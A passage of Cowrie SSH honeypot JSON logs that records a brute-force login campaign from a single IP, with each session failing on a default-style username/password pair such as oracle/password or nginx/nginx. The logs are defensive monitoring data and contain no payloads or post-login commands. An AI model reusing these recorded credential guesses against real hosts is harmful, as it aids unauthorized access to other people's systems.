SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:03:40.097278Z","src_ip":"212.227.125.160","session":"2e6dad7cd7d8"}
{"eventid":"cowrie.login.failed","username":"rocky","password":"rocky","message":"login attempt [rocky/rocky] failed","sensor":"my-vps","timestamp":"2025-08-26T22:03:40.242633Z","src_ip":"212.227.125.160","session":"2e6dad7cd7d8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:41.333057Z","src_ip":"212.227.125.160","session":"2e6dad7cd7d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42186,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bff2b14b211","protocol":"ssh","message":"New connection: 212.227.125.160:42186 (1.2.3.4:22) [session: 4bff2b14b211]","sensor":"my-vps","timestamp":"2025-08-26T22:03:45.541023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:45.554526Z","src_ip":"212.227.125.160","session":"4bff2b14b211"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:03:45.615194Z","src_ip":"212.227.125.160","session":"4bff2b14b211"}
{"eventid":"cowrie.login.failed","username":"o3-root","password":"o3-root","message":"login attempt [o3-root/o3-root] failed","sensor":"my-vps","timestamp":"2025-08-26T22:03:45.822702Z","src_ip":"212.227.125.160","session":"4bff2b14b211"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:46.877920Z","src_ip":"212.227.125.160","session":"4bff2b14b211"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37578,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1ca4c198ccd","protocol":"ssh","message":"New connection: 212.227.125.160:37578 (1.2.3.4:22) [session: d1ca4c198ccd]","sensor":"my-vps","timestamp":"2025-08-26T22:03:50.921474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:50.922539Z","src_ip":"212.227.125.160","session":"d1ca4c198ccd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:03:51.335568Z","src_ip":"212.227.125.160","session":"d1ca4c198ccd"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-26T22:03:51.859360Z","src_ip":"212.227.125.160","session":"d1ca4c198ccd"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:53.072340Z","src_ip":"212.227.125.160","session":"d1ca4c198ccd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32960,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d713c8a64ca","protocol":"ssh","message":"New connection: 212.227.125.160:32960 (1.2.3.4:22) [session: 7d713c8a64ca]","sensor":"my-vps","timestamp":"2025-08-26T22:03:57.084116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:57.143423Z","src_ip":"212.227.125.160","session":"7d713c8a64ca"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:03:57.144197Z","src_ip":"212.227.125.160","session":"7d713c8a64ca"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:03:57.557611Z","src_ip":"212.227.125.160","session":"7d713c8a64ca"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:58.812926Z","src_ip":"212.227.125.160","session":"7d713c8a64ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56584,"dst_ip":"1.2.3.4","dst_port":22,"session":"faadd34184cf","protocol":"ssh","message":"New connection: 212.227.125.160:56584 (1.2.3.4:22) [session: faadd34184cf]","sensor":"my-vps","timestamp":"2025-08-26T22:04:02.756756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:04:02.758960Z","src_ip":"212.227.125.160","session":"faadd34184cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:04:02.809691Z","src_ip":"212.227.125.160","session":"faadd34184cf"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:04:02.962742Z","src_ip":"212.227.125.160","session":"faadd34184cf"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:04:04.016044Z","src_ip":"212.227.125.160","session":"faadd34184cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51974,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c1069e85aa1","protocol":"ssh","message":"New connection: 212.227.125.160:51974 (1.2.3.4:22) [session: 1c1069e85aa1]","sensor":"my-vps","timestamp":"2025-08-26T22:04:08.060751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:04:08.069927Z","src_ip":"212.227.125.160","session":"1c1069e85aa1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:04:08.110279Z","src_ip":"212.227.125.160","session":"1c1069e85aa1"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-26T22:04:08.334095Z","src_ip":"212.227.125.160","session":"1c1069e85aa1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:04:09.387029Z","src_ip":"212.227.125.160","session":"1c1069e85aa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47358,"dst_ip":"1.2.3.4","dst_port":22,"session":"102c950b1a91","protocol":"ssh","message":"New connection: 212.227.125.160:47358 (1.2.3.4:22) [session: 102c950b1a91]","sensor":"my-vps","timestamp":"2025-08-26T22:04:13.372164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:04:13.373468Z","src_ip":"212.227.125.160","session":"102c950b1a91"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:04:13.421567Z","src_ip":"212.227.125.160","session":"102c950b1a91"}
{"eventid":"cowrie.login.failed","username":"uucp","password":"uucp","message":"login attempt [uucp/uucp] failed","sensor":"my-vps","timestamp":"2025-08-26T22:04:13.621958Z","src_ip":"212.227.125.160","session":"102c950b1a91"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:04:14.673870Z","src_ip":"212.227.125.160","session":"102c950b1a91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42744,"dst_ip":"1.2.3.4","dst_port":22,"session":"adaf0cfbaf36","protocol":"ssh","message":"New connection: 212.227.125.160:42744 (1.2.3.4:22) [session: adaf0cfbaf36]","sensor":"my-vps","timestamp":"2025-08-26T22:04:18.948985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:04:19.055548Z","src_ip":"212.227.125.160","session":"adaf0cfbaf36"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:04:19.056204Z","src_ip":"212.227.125.160","session":"adaf0cfbaf36"}
{"eventid":"cowrie.login.failed","username":"g","password":"g","message":"login attempt [g/g] failed","sensor":"my-vps","timestamp":"2025-08-26T22:04:19.433010Z","src_ip":"212.227.125.160","session":"adaf0cfbaf36"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:04:20.485191Z","src_ip":"212.227.125.160","session":"adaf0cfbaf36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38130,"dst_ip":"1.2.3.4","dst_port":22,"session":"3142b76c7a93","protocol":"ssh","message":"New connection: 212.227.125.160:38130 (1.2.3.4:22) [session: 3142b76c7a93]","sensor":"my-vps","timestamp":"2025-08-26T22:04:24.945393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:04:24.946303Z","src_ip":"212.227.125.160","session":"3142b76c7a93"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:04:25.095657Z","src_ip":"212.227.125.160","session":"3142b76c7a93"}
{"eventid":"cowrie.login.failed","username":"samba","password":"samba","message":"login attempt [samba/samba] failed","sensor":"my-vps","timestamp":"2025-08-26T22:04:25.482851Z","src_ip":"212.227.125.160","session":"3142b76c7a93"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:04:26.534427Z","src_ip":"212.227.125.160","session":"3142b76c7a93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33514,"dst_ip":"1.2.3.4","dst_port":22,"session":"4edbfe469c3f","protocol":"ssh","message":"New connection: 212.227.125.160:33514 (1.2.3.4:22) [session: 4edbfe469c3f]","sensor":"my-vps","timestamp":"2025-08-26T22:04:31.160291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:04:31.161213Z","src_ip":"212.227.125.160","session":"4edbfe469c3f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:04:31.210862Z","src_ip":"212.227.125.160","session":"4edbfe469c3f"}
{"eventid":"cowrie.login.failed","username":"cowrie","password":"cowrie","message":"login attempt [cowrie/cowrie] failed","sensor":"my-vps","timestamp":"2025-08-26T22:04:31.367282Z","src_ip":"212.227.125.160","session":"4edbfe469c3f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:04:32.436516Z","src_ip":"212.227.125.160","session":"4edbfe469c3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57134,"dst_ip":"1.2.3.4","dst_port":22,"session":"30e17c5c1489","protocol":"ssh","message":"New connection: 212.227.125.160:57134 (1.2.3.4:22) [session: 30e17c5c1489]","sensor":"my-vps","timestamp":"2025-08-26T22:04:36.874319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:04:36.888035Z","src_ip":"212.227.125.160","session":"30e17c5c1489"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-